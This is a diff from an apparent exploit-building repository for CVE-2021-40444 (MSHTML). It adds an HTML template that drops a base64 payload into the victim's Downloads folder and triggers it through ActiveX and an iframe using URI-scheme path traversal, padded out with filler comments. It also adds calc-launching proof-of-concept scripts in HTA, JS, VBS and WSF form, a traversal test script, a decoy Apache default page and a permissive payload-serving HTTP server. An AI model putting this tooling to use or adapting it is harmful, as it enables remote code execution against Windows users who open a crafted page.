// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
</script>
</body>
</html>

109
template/cabless-smuggling-sample1.html

@ -0,0 +1,109 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CVE-2021-40444 (Cab-less)</title>
</head>
<body>
<script>
function base64ToArrayBuffer(base64) {
const binary_string = window.atob(base64);
const len = binary_string.length;
var bytes = new Uint8Array(len);
for (let i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i);}
return bytes.buffer;
}
function isIE() {
ua = navigator.userAgent;
return ua.indexOf("MSIE ") > -1 || ua.indexOf("Trident/") > -1;
}
function save()
{
var file = '<BASE64_DATA_HERE>';
var data = base64ToArrayBuffer(file);
var blob = new Blob([data], {type: '<MIME_TYPE_HERE>'});
var fileName = '<INF_CHANGE_HERE>';
if (isIE()) {
navigator.msSaveBlob(blob, fileName);
} else {
var a = document.createElement('a');
document.body.appendChild(a);
a.style = 'display: none';
var url = window.URL.createObjectURL(blob);
a.href = url;
a.download = fileName;
a.click();
window.URL.revokeObjectURL(url);
}
}
</script>
<script>
function process(){
new ActiveXObject('htmlfile').Script.location = '<URI_SCHEME_HERE>:../../../Downloads/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>';
var i = document.createElement("iframe");
document.documentElement.appendChild(i);
i.src = '<URI_SCHEME_HERE>:../../../Downloads/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>';
}
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
</script>
<script>
save();
process();
</script>
</body>
</html>

376
template/index.html

@ -0,0 +1,376 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!--
Modified from the Debian original for Ubuntu
Last updated: 2016-11-16
See: https://launchpad.net/bugs/1288690
-->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Apache2 Ubuntu Default Page: It works</title>
<style type="text/css" media="screen">
* {
margin: 0px 0px 0px 0px;
padding: 0px 0px 0px 0px;
}
body, html {
padding: 3px 3px 3px 3px;
background-color: #D8DBE2;
font-family: Verdana, sans-serif;
font-size: 11pt;
text-align: center;
}
div.main_page {
position: relative;
display: table;
width: 800px;
margin-bottom: 3px;
margin-left: auto;
margin-right: auto;
padding: 0px 0px 0px 0px;
border-width: 2px;
border-color: #212738;
border-style: solid;
background-color: #FFFFFF;
text-align: center;
}
div.page_header {
height: 99px;
width: 100%;
background-color: #F5F6F7;
}
div.page_header span {
margin: 15px 0px 0px 50px;
font-size: 180%;
font-weight: bold;
}
div.page_header img {
margin: 3px 0px 0px 40px;
border: 0px 0px 0px;
}
div.table_of_contents {
clear: left;
min-width: 200px;
margin: 3px 3px 3px 3px;
background-color: #FFFFFF;
text-align: left;
}
div.table_of_contents_item {
clear: left;
width: 100%;
margin: 4px 0px 0px 0px;
background-color: #FFFFFF;
color: #000000;
text-align: left;
}
div.table_of_contents_item a {
margin: 6px 0px 0px 6px;
}
div.content_section {
margin: 3px 3px 3px 3px;
background-color: #FFFFFF;
text-align: left;
}
div.content_section_text {
padding: 4px 8px 4px 8px;
color: #000000;
font-size: 100%;
}
div.content_section_text pre {
margin: 8px 0px 8px 0px;
padding: 8px 8px 8px 8px;
border-width: 1px;
border-style: dotted;
border-color: #000000;
background-color: #F5F6F7;
font-style: italic;
}
div.content_section_text p {
margin-bottom: 6px;
}
div.content_section_text ul, div.content_section_text li {
padding: 4px 8px 4px 16px;
}
div.section_header {
padding: 3px 6px 3px 6px;
background-color: #8E9CB2;
color: #FFFFFF;
font-weight: bold;
font-size: 112%;
text-align: center;
}
div.section_header_red {
background-color: #CD214F;
}
div.section_header_grey {
background-color: #9F9386;
}
.floating_element {
position: relative;
float: left;
}
div.table_of_contents_item a,
div.content_section_text a {
text-decoration: none;
font-weight: bold;
}
div.table_of_contents_item a:link,
div.table_of_contents_item a:visited,
div.table_of_contents_item a:active {
color: #000000;
}
div.table_of_contents_item a:hover {
background-color: #000000;
color: #FFFFFF;
}
div.content_section_text a:link,
div.content_section_text a:visited,
div.content_section_text a:active {
background-color: #DCDFE6;
color: #000000;
}
div.content_section_text a:hover {
background-color: #000000;
color: #DCDFE6;
}
div.validator {
}
</style>
</head>
<body>
<div class="main_page">
<div class="page_header floating_element">
<img src="/icons/ubuntu-logo.png" alt="Ubuntu Logo" class="floating_element"/>
<span class="floating_element">
Apache2 Ubuntu Default Page
</span>
</div>
<!-- <div class="table_of_contents floating_element">
<div class="section_header section_header_grey">
TABLE OF CONTENTS
</div>
<div class="table_of_contents_item floating_element">
<a href="#about">About</a>
</div>
<div class="table_of_contents_item floating_element">
<a href="#changes">Changes</a>
</div>
<div class="table_of_contents_item floating_element">
<a href="#scope">Scope</a>
</div>
<div class="table_of_contents_item floating_element">
<a href="#files">Config files</a>
</div>
</div>
-->
<div class="content_section floating_element">
<div class="section_header section_header_red">
<div id="about"></div>
It works!
</div>
<div class="content_section_text">
<p>
This is the default welcome page used to test the correct
operation of the Apache2 server after installation on Ubuntu systems.
It is based on the equivalent page on Debian, from which the Ubuntu Apache
packaging is derived.
If you can read this page, it means that the Apache HTTP server installed at
this site is working properly. You should <b>replace this file</b> (located at
<tt>/var/www/html/index.html</tt>) before continuing to operate your HTTP server.
</p>
<p>
If you are a normal user of this web site and don't know what this page is
about, this probably means that the site is currently unavailable due to
maintenance.
If the problem persists, please contact the site's administrator.
</p>
</div>
<div class="section_header">
<div id="changes"></div>
Configuration Overview
</div>
<div class="content_section_text">
<p>
Ubuntu's Apache2 default configuration is different from the
upstream default configuration, and split into several files optimized for
interaction with Ubuntu tools. The configuration system is
<b>fully documented in
/usr/share/doc/apache2/README.Debian.gz</b>. Refer to this for the full
documentation. Documentation for the web server itself can be
found by accessing the <a href="/manual">manual</a> if the <tt>apache2-doc</tt>
package was installed on this server.
</p>
<p>
The configuration layout for an Apache2 web server installation on Ubuntu systems is as follows:
</p>
<pre>
/etc/apache2/
|-- apache2.conf
| `-- ports.conf
|-- mods-enabled
| |-- *.load
| `-- *.conf
|-- conf-enabled
| `-- *.conf
|-- sites-enabled
| `-- *.conf
</pre>
<ul>
<li>
<tt>apache2.conf</tt> is the main configuration
file. It puts the pieces together by including all remaining configuration
files when starting up the web server.
</li>
<li>
<tt>ports.conf</tt> is always included from the
main configuration file. It is used to determine the listening ports for
incoming connections, and this file can be customized anytime.
</li>
<li>
Configuration files in the <tt>mods-enabled/</tt>,
<tt>conf-enabled/</tt> and <tt>sites-enabled/</tt> directories contain
particular configuration snippets which manage modules, global configuration
fragments, or virtual host configurations, respectively.
</li>
<li>
They are activated by symlinking available
configuration files from their respective
*-available/ counterparts. These should be managed
by using our helpers
<tt>
a2enmod,
a2dismod,
</tt>
<tt>
a2ensite,
a2dissite,
</tt>
and
<tt>
a2enconf,
a2disconf
</tt>. See their respective man pages for detailed information.
</li>
<li>
The binary is called apache2. Due to the use of
environment variables, in the default configuration, apache2 needs to be
started/stopped with <tt>/etc/init.d/apache2</tt> or <tt>apache2ctl</tt>.
<b>Calling <tt>/usr/bin/apache2</tt> directly will not work</b> with the
default configuration.
</li>
</ul>
</div>
<div class="section_header">
<div id="docroot"></div>
Document Roots
</div>
<div class="content_section_text">
<p>
By default, Ubuntu does not allow access through the web browser to
<em>any</em> file apart of those located in <tt>/var/www</tt>,
<a href="http://httpd.apache.org/docs/2.4/mod/mod_userdir.html" rel="nofollow">public_html</a>
directories (when enabled) and <tt>/usr/share</tt> (for web
applications). If your site is using a web document root
located elsewhere (such as in <tt>/srv</tt>) you may need to whitelist your
document root directory in <tt>/etc/apache2/apache2.conf</tt>.
</p>
<p>
The default Ubuntu document root is <tt>/var/www/html</tt>. You
can make your own virtual hosts under /var/www. This is different
to previous releases which provides better security out of the box.
</p>
</div>
<div class="section_header">
<div id="bugs"></div>
Reporting Problems
</div>
<div class="content_section_text">
<p>
Please use the <tt>ubuntu-bug</tt> tool to report bugs in the
Apache2 package with Ubuntu. However, check <a
href="https://bugs.launchpad.net/ubuntu/+source/apache2"
rel="nofollow">existing bug reports</a> before reporting a new bug.
</p>
<p>
Please report bugs specific to modules (such as PHP and others)
to respective packages, not to the web server itself.
</p>
</div>
</div>
</div>
<div class="validator">
</div>
</body>
</html>

BIN
data/NK36QZW9A0TY.dll → test/calc.dll

Binary file not shown.

11
test/calc.hta

@ -0,0 +1,11 @@
<script language="VBScript">
Function Calc()
Dim wsh
Set wsh = CreateObject("Wscript.Shell")
wsh.run "cmd /c calc.exe"
Set wsh = Nothing
End Function
Calc
self.close
</script>

6
test/calc.js

@ -0,0 +1,6 @@
function calc(){
var x = new ActiveXObject("WScript.shell");
x.Run("cmd /c calc");
}
calc();

8
test/calc.vbs

@ -0,0 +1,8 @@
Function Calc()
Dim wsh
Set wsh = CreateObject("Wscript.Shell")
wsh.run "cmd /c calc.exe"
Set wsh = Nothing
End Function
Calc

1
test/job-jscript.wsf

@ -0,0 +1 @@
<job><script language="JScript">var x = new ActiveXObject("WScript.shell");x.Run("cmd /c calc");</script></job>

1
test/job-vbs.wsf

@ -0,0 +1 @@
<job id="VBScriptJob"><script language="VBScript">CreateObject("WScript.Shell").Run "cmd /c calc"</script></job>

2
test/test.js

@ -0,0 +1,2 @@
var o = new ActiveXObject('htmlfile').Script.location='.wsf:../../../../../Users/d3adc0de.PCOIPTEST/Downloads/YK2TLVILEHG2.rar?.wsf';
WScript.Echo(o);

51
util/server.py

@ -0,0 +1,51 @@
import argparse
import sys
from builtins import Exception
from http.server import HTTPServer, SimpleHTTPRequestHandler
from werkzeug.serving import ForkingMixIn
class CORSRequestHandler(SimpleHTTPRequestHandler):
def end_headers(self):
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')
self.send_header('Cache-Control', 'no-store, no-cache, must-revalidate')
return super(CORSRequestHandler, self).end_headers()
def do_OPTIONS(self):
self.do_GET()
class ForkingHTTPServer(ForkingMixIn, HTTPServer):
def finish_request(self, request, client_address):
try:
request.settimeout(15)
# "super" can not be used because BaseServer is not created from object
HTTPServer.finish_request(self, request, client_address)
except Exception as e:
print(f"[-] {e}")